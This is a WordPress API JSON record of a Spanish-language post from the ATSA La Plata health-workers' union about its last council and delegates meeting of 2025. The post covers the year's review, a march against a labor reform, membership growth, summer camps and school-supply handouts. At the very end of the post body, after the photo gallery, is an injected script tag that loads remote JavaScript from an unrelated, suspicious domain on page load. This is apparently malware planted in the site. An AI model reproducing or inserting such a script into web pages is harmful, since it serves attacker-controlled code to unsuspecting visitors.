{"id":20248,"date":"2025-12-22T14:30:00","date_gmt":"2025-12-22T17:30:00","guid":{"rendered":"http:\/\/atsalaplata.org.ar\/web\/?p=20248"},"modified":"2026-02-02T16:09:20","modified_gmt":"2026-02-02T19:09:20","slug":"ultima-reunion-de-consejo-directivo-y-cuerpo-de-delegados-as","status":"publish","type":"post","link":"http:\/\/atsalaplata.org.ar\/web\/2025\/12\/ultima-reunion-de-consejo-directivo-y-cuerpo-de-delegados-as\/","title":{"rendered":"\u00daltima reuni\u00f3n de Consejo Directivo y Cuerpo de Delegados\/as"},"content":{"rendered":"\n<p>\ud83d\udce3En la jornada de hoy, se llev\u00f3 a cabo la \u00faltima reuni\u00f3n del Consejo Directivo y el Cuerpo de Delegados\/as en el sal\u00f3n auditorio de de SANIDAD ATSA La Plata.<\/p>\n\n\n\n<p>\ud83d\udc49Fue encabezada por nuestro Secretario General Pedro F. Borgini, quien junto al Sec. Adjunto, Ricardo Padr\u00f3n, repasaron las actividades realizadas y un balance del a\u00f1o en curso.<\/p>\n\n\n\n<p>En ese marco, se hizo menci\u00f3n a la Marcha contra la Reforma Laboral del Gobierno Nacional, que se llev\u00f3 a cabo el pasado jueves 18 de diciembre- impulsada por la CGT- y la postergaci\u00f3n de su tratamiento para febrero del a\u00f1o pr\u00f3ximo.<\/p>\n\n\n\n<p>Se desglosaron las tareas que llev\u00f3 a cabo cada Secretar\u00eda, y el aumento \u201csignificativo\u201d de afiliaciones al sindicato.<\/p>\n\n\n\n<p>En otro \u00f3rden de cosas, se habl\u00f3 de la Apertura de la Temporada de Verano 2026, tanto en el Complejo Recreativo de Los Hornos, como en el Camping de Necochea; Y del inicio de la \u201cColonia de Vacaciones\u201d, como as\u00ed tambi\u00e9n en el resto de las localidades del interior.<\/p>\n\n\n\n<p>Tambi\u00e9n, de la Entrega de \u00fatiles que se har\u00e1 a los\/as hijos\/as de afiliados\/as- como todos los a\u00f1os- a trav\u00e9s de la Secretar\u00eda de Organizaci\u00f3n, y cuya inscripci\u00f3n al beneficio culmina durante la primera semana de enero.<\/p>\n\n\n\n<p>A su vez, se hizo una menci\u00f3n al cierre de a\u00f1o de la Agrupaci\u00f3n de jubilados\/as TRINOS.<\/p>\n\n\n\n<p>Finalizando el encuentro, el Secretario General agradeci\u00f3 el acompa\u00f1amiento a todo el Consejo Directivo y al Cuerpo de Delegados y alent\u00f3 el trabajo en conjunto, de cara al 2026, para bregar por los derechos de los\/as trabajadores\/as y por M\u00c1S UNIDAD y compromiso, para hacerle frente a un Gobierno Nacional que intenta d\u00eda a d\u00eda, destruir a las instituciones sindicales.<\/p>\n\n\n\n<p>#SanidadATSALaPlata #SiempreJuntoAVos<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" data-id=\"20252\" src=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-1.png\" alt=\"\" class=\"wp-image-20252\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1080\" data-id=\"20251\" src=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-2.png\" alt=\"\" class=\"wp-image-20251\" srcset=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-2.png 1080w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-2-768x768.png 768w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-2-1024x1024.png 1024w\" sizes=\"auto, (max-width: 1080px) 100vw, 1080px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1080\" data-id=\"20254\" src=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-3.png\" alt=\"\" class=\"wp-image-20254\" srcset=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-3.png 1080w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-3-768x768.png 768w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-3-1024x1024.png 1024w\" sizes=\"auto, (max-width: 1080px) 100vw, 1080px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1080\" data-id=\"20253\" src=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-4.png\" alt=\"\" class=\"wp-image-20253\" srcset=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-4.png 1080w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-4-768x768.png 768w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-4-1024x1024.png 1024w\" sizes=\"auto, (max-width: 1080px) 100vw, 1080px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1080\" data-id=\"20249\" src=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-5.png\" alt=\"\" class=\"wp-image-20249\" srcset=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-5.png 1080w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-5-768x768.png 768w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-5-1024x1024.png 1024w\" sizes=\"auto, (max-width: 1080px) 100vw, 1080px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1080\" data-id=\"20250\" src=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-6.png\" alt=\"\" class=\"wp-image-20250\" srcset=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-6.png 1080w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-6-768x768.png 768w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-6-1024x1024.png 1024w\" sizes=\"auto, (max-width: 1080px) 100vw, 1080px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1080\" data-id=\"20255\" src=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-7.png\" alt=\"\" class=\"wp-image-20255\" srcset=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-7.png 1080w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-7-768x768.png 768w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-7-1024x1024.png 1024w\" sizes=\"auto, (max-width: 1080px) 100vw, 1080px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1080\" data-id=\"20256\" src=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-8.png\" alt=\"\" class=\"wp-image-20256\" srcset=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-8.png 1080w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-8-768x768.png 768w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-8-1024x1024.png 1024w\" sizes=\"auto, (max-width: 1080px) 100vw, 1080px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1080\" data-id=\"20257\" src=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-9.png\" alt=\"\" class=\"wp-image-20257\" srcset=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-9.png 1080w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-9-768x768.png 768w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-9-1024x1024.png 1024w\" sizes=\"auto, (max-width: 1080px) 100vw, 1080px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1080\" data-id=\"20258\" src=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-10.png\" alt=\"\" class=\"wp-image-20258\" srcset=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-10.png 1080w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-10-768x768.png 768w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-10-1024x1024.png 1024w\" sizes=\"auto, (max-width: 1080px) 100vw, 1080px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1080\" data-id=\"20259\" src=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-11.png\" alt=\"\" class=\"wp-image-20259\" srcset=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-11.png 1080w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-11-768x768.png 768w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-11-1024x1024.png 1024w\" sizes=\"auto, (max-width: 1080px) 100vw, 1080px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1080\" height=\"1080\" data-id=\"20260\" src=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-12.png\" alt=\"\" class=\"wp-image-20260\" srcset=\"http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-12.png 1080w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-12-768x768.png 768w, http:\/\/atsalaplata.org.ar\/web\/wp-content\/uploads\/2025\/12\/Consejo-12-1024x1024.png 1024w\" sizes=\"auto, (max-width: 1080px) 100vw, 1080px\" \/><\/figure>\n<\/figure>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>\ud83d\udce3En la jornada de hoy, se llev\u00f3 a cabo la \u00faltima reuni\u00f3n del Consejo Directivo&#8230;<\/p>\n","protected":false},"author":2,"featured_media":20252,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[86,87,146,98,147,97,85,96,148],"tags":[],"class_list":["post-20248","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-afiliado","category-convenios","category-destacado","category-home","category-novedades","category-sec-de-cultura","category-sec-de-prensa","category-sec-gremial","category-ultimas-noticias"],"_links":{"self":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/20248","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/comments?post=20248"}],"version-history":[{"count":2,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/20248\/revisions"}],"predecessor-version":[{"id":20612,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/20248\/revisions\/20612"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media\/20252"}],"wp:attachment":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media?parent=20248"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/categories?post=20248"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/tags?post=20248"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}